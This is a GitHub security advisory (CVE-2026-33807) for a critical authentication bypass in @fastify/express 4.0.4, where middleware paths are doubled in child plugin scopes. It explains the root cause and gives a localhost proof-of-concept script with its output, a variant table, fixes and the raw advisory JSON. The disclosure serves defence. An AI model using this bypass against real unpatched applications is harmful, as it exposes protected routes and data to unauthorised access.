GHSA-HRWM-HGMJ-7P9C

Vulnerability from github – Published: 2026-04-16 01:03 – Updated: 2026-04-16 01:03
VLAI?
Summary
@fastify/express's middleware path doubling causes authentication bypass in child plugin scopes
Details

Summary

@fastify/express v4.0.4 contains a path handling bug in the onRegister function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required — this affects the default Fastify configuration.

Details

The vulnerability exists in the onRegister function at index.js lines 92-101. When a child plugin is registered with a prefix, the onRegister hook copies middleware from the parent scope and re-registers it using instance.use(...middleware). However, the middleware paths stored in kMiddlewares are already prefixed from their original registration.

The call flow demonstrates the problem: 1. Parent scope registers middleware: app.use('/admin', authFn)use() calculates path as '' + '/admin' = '/admin' — stores ['/admin', authFn] in kMiddlewares 2. Child plugin registers with { prefix: '/admin' } — triggers onRegister(instance) 3. onRegister copies parent middleware and calls instance.use('/admin', authFn) on child 4. Child's use() function calculates path as '/admin' + '/admin' = '/admin/admin' — registers middleware with doubled path 5. Routes in child scope use the child's Express instance, where middleware is registered under the incorrect path /admin/admin 6. Requests to /admin/secret don't match /admin/admin — middleware is silently skipped

The root cause is in the use() function at lines 25-26, which always prepends this.prefix to string paths, combined with onRegister re-calling use() with already-prefixed paths.

PoC

const fastify = require('fastify');
const http = require('http');

function get(port, url) {
  return new Promise((resolve, reject) => {
    http.get('http://localhost:' + port + url, (res) => {
      let data = '';
      res.on('data', (chunk) => data += chunk);
      res.on('end', () => resolve({ status: res.statusCode, body: data }));
    }).on('error', reject);
  });
}

async function test() {
  const app = fastify({ logger: false });
  await app.register(require('@fastify/express'));

  // Middleware enforcing auth on /admin routes
  app.use('/admin', function(req, res, next) {
    if (!req.headers.authorization) {
      res.statusCode = 403;
      res.setHeader('content-type', 'application/json');
      res.end(JSON.stringify({ error: 'Forbidden' }));
      return;
    }
    next();
  });

  // Root scope route — middleware works correctly
  app.get('/admin/root-data', async () => ({ data: 'root-secret' }));

  // Child scope route — middleware BYPASSED
  await app.register(async function(child) {
    child.get('/secret', async () => ({ data: 'child-secret' }));
  }, { prefix: '/admin' });

  await app.listen({ port: 19876, host: '0.0.0.0' });

  // Root scope: correctly blocked
  let r = await get(19876, '/admin/root-data');
  console.log('/admin/root-data (no auth):', r.status, r.body);
  // Output: 403 {"error":"Forbidden"}

  // Child scope: BYPASSED — secret data returned without auth
  r = await get(19876, '/admin/secret');
  console.log('/admin/secret (no auth):', r.status, r.body);
  // Output: 200 {"data":"child-secret"}

  await app.close();
}
test();

Actual output:

/admin/root-data (no auth): 403 {"error":"Forbidden"}
/admin/secret (no auth): 200 {"data":"child-secret"}

Impact

Complete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.

  • No special request crafting is required — normal requests bypass the middleware
  • It affects the idiomatic Fastify plugin pattern commonly used in production
  • The bypass is silent with no errors or warnings
  • Developers' basic testing of root-scoped routes will pass, masking the vulnerability
  • Any child plugin scope that shares a prefix with middleware is affected

Applications using @fastify/express with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.

Affected Versions

  • @fastify/express v4.0.4 (latest at time of discovery)
  • Fastify 5.x in default configuration
  • No special router options required (ignoreDuplicateSlashes not needed)
  • Affects any child plugin registration where the prefix overlaps with middleware path scoping
  • Does NOT affect middleware registered without path scoping (global middleware)
  • Does NOT affect middleware registered on root path (/) due to special case handling

Variant Testing

Scenario Middleware Path Child Prefix Result
Root route /admin/root-data /admin N/A Middleware runs (403)
Child route /admin/secret /admin /admin BYPASS (200)
Child route /api/data /api /api BYPASS (200)
Nested child /admin/sub/data /admin /admin/sub BYPASS — path becomes /admin/sub/admin
Middleware on / with any child / /api No bypass — path === '/' && prefix.length > 0 special case

Suggested Fix

The onRegister function should store and re-use the original unprefixed middleware paths, or avoid re-calling the use() function entirely. Options include: 1. Store the original path and function separately in kMiddlewares before prefixing 2. Strip the parent prefix before re-registering in child scopes 3. Store already-constructed Express middleware objects rather than re-processing paths

Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 4.0.4"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@fastify/express"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.0.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-33807"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-436"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T01:03:25Z",
    "nvd_published_at": "2026-04-15T10:16:48Z",
    "severity": "CRITICAL"
  },
  "details": "### Summary\n\n`@fastify/express` v4.0.4 contains a path handling bug in the `onRegister` function that causes middleware paths to be doubled when inherited by child plugins. This results in complete bypass of Express middleware security controls for all routes defined within child plugin scopes that share a prefix with parent-scoped middleware. No special configuration is required \u2014 this affects the default Fastify configuration.\n\n### Details\n\nThe vulnerability exists in the `onRegister` function at `index.js` lines 92-101. When a child plugin is registered with a prefix, the `onRegister` hook copies middleware from the parent scope and re-registers it using `instance.use(...middleware)`. However, the middleware paths stored in `kMiddlewares` are already prefixed from their original registration.\n\nThe call flow demonstrates the problem:\n1. Parent scope registers middleware: `app.use(\u0027/admin\u0027, authFn)` \u2014 `use()` calculates path as `\u0027\u0027 + \u0027/admin\u0027 = \u0027/admin\u0027` \u2014 stores `[\u0027/admin\u0027, authFn]` in `kMiddlewares`\n2. Child plugin registers with `{ prefix: \u0027/admin\u0027 }` \u2014 triggers `onRegister(instance)`\n3. `onRegister` copies parent middleware and calls `instance.use(\u0027/admin\u0027, authFn)` on child\n4. Child\u0027s `use()` function calculates path as `\u0027/admin\u0027 + \u0027/admin\u0027 = \u0027/admin/admin\u0027` \u2014 registers middleware with doubled path\n5. Routes in child scope use the child\u0027s Express instance, where middleware is registered under the incorrect path `/admin/admin`\n6. Requests to `/admin/secret` don\u0027t match `/admin/admin` \u2014 middleware is silently skipped\n\nThe root cause is in the `use()` function at lines 25-26, which always prepends `this.prefix` to string paths, combined with `onRegister` re-calling `use()` with already-prefixed paths.\n\n### PoC\n\n```javascript\nconst fastify = require(\u0027fastify\u0027);\nconst http = require(\u0027http\u0027);\n\nfunction get(port, url) {\n  return new Promise((resolve, reject) =\u003e {\n    http.get(\u0027http://localhost:\u0027 + port + url, (res) =\u003e {\n      let data = \u0027\u0027;\n      res.on(\u0027data\u0027, (chunk) =\u003e data += chunk);\n      res.on(\u0027end\u0027, () =\u003e resolve({ status: res.statusCode, body: data }));\n    }).on(\u0027error\u0027, reject);\n  });\n}\n\nasync function test() {\n  const app = fastify({ logger: false });\n  await app.register(require(\u0027@fastify/express\u0027));\n  \n  // Middleware enforcing auth on /admin routes\n  app.use(\u0027/admin\u0027, function(req, res, next) {\n    if (!req.headers.authorization) {\n      res.statusCode = 403;\n      res.setHeader(\u0027content-type\u0027, \u0027application/json\u0027);\n      res.end(JSON.stringify({ error: \u0027Forbidden\u0027 }));\n      return;\n    }\n    next();\n  });\n  \n  // Root scope route \u2014 middleware works correctly\n  app.get(\u0027/admin/root-data\u0027, async () =\u003e ({ data: \u0027root-secret\u0027 }));\n  \n  // Child scope route \u2014 middleware BYPASSED\n  await app.register(async function(child) {\n    child.get(\u0027/secret\u0027, async () =\u003e ({ data: \u0027child-secret\u0027 }));\n  }, { prefix: \u0027/admin\u0027 });\n  \n  await app.listen({ port: 19876, host: \u00270.0.0.0\u0027 });\n  \n  // Root scope: correctly blocked\n  let r = await get(19876, \u0027/admin/root-data\u0027);\n  console.log(\u0027/admin/root-data (no auth):\u0027, r.status, r.body);\n  // Output: 403 {\"error\":\"Forbidden\"}\n  \n  // Child scope: BYPASSED \u2014 secret data returned without auth\n  r = await get(19876, \u0027/admin/secret\u0027);\n  console.log(\u0027/admin/secret (no auth):\u0027, r.status, r.body);\n  // Output: 200 {\"data\":\"child-secret\"}\n  \n  await app.close();\n}\ntest();\n```\n\nActual output:\n```\n/admin/root-data (no auth): 403 {\"error\":\"Forbidden\"}\n/admin/secret (no auth): 200 {\"data\":\"child-secret\"}\n```\n\n### Impact\n\nComplete bypass of Express middleware security controls for all routes defined in child plugin scopes. Authentication, authorization, rate limiting, CSRF protection, audit logging, and any other middleware-based security mechanisms are silently skipped for affected routes.\n\n- No special request crafting is required \u2014 normal requests bypass the middleware\n- It affects the idiomatic Fastify plugin pattern commonly used in production\n- The bypass is silent with no errors or warnings\n- Developers\u0027 basic testing of root-scoped routes will pass, masking the vulnerability\n- Any child plugin scope that shares a prefix with middleware is affected\n\nApplications using `@fastify/express` with path-scoped middleware and child plugins with matching prefixes are vulnerable in default configurations.\n\n### Affected Versions\n\n- `@fastify/express` v4.0.4 (latest at time of discovery)\n- Fastify 5.x in default configuration\n- No special router options required (`ignoreDuplicateSlashes` not needed)\n- Affects any child plugin registration where the prefix overlaps with middleware path scoping\n- Does NOT affect middleware registered without path scoping (global middleware)\n- Does NOT affect middleware registered on root path (`/`) due to special case handling\n\n### Variant Testing\n\n| Scenario | Middleware Path | Child Prefix | Result |\n|---|---|---|---|\n| Root route `/admin/root-data` | `/admin` | N/A | Middleware runs (403) |\n| Child route `/admin/secret` | `/admin` | `/admin` | **BYPASS** (200) |\n| Child route `/api/data` | `/api` | `/api` | **BYPASS** (200) |\n| Nested child `/admin/sub/data` | `/admin` | `/admin/sub` | **BYPASS** \u2014 path becomes `/admin/sub/admin` |\n| Middleware on `/` with any child | `/` | `/api` | No bypass \u2014 `path === \u0027/\u0027 \u0026\u0026 prefix.length \u003e 0` special case |\n\n### Suggested Fix\n\nThe `onRegister` function should store and re-use the original unprefixed middleware paths, or avoid re-calling the `use()` function entirely. Options include:\n1. Store the original path and function separately in `kMiddlewares` before prefixing\n2. Strip the parent prefix before re-registering in child scopes\n3. Store already-constructed Express middleware objects rather than re-processing paths",
  "id": "GHSA-hrwm-hgmj-7p9c",
  "modified": "2026-04-16T01:03:25Z",
  "published": "2026-04-16T01:03:25Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/fastify/fastify-express/security/advisories/GHSA-hrwm-hgmj-7p9c"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33807"
    },
    {
      "type": "WEB",
      "url": "https://cna.openjsf.org/security-advisories.html"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/fastify/fastify-express"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "@fastify/express\u0027s middleware path doubling causes authentication bypass in child plugin scopes"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.